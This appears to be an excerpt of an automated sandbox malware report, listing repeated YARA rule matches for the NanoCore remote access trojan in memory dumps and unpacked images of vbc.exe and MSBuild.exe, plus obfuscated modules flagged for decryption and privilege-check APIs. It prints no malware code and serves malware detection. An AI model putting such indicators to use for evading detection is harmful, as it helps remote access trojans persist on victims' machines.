        Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: vbc.exe PID: 2780, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: vbc.exe PID: 2780, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
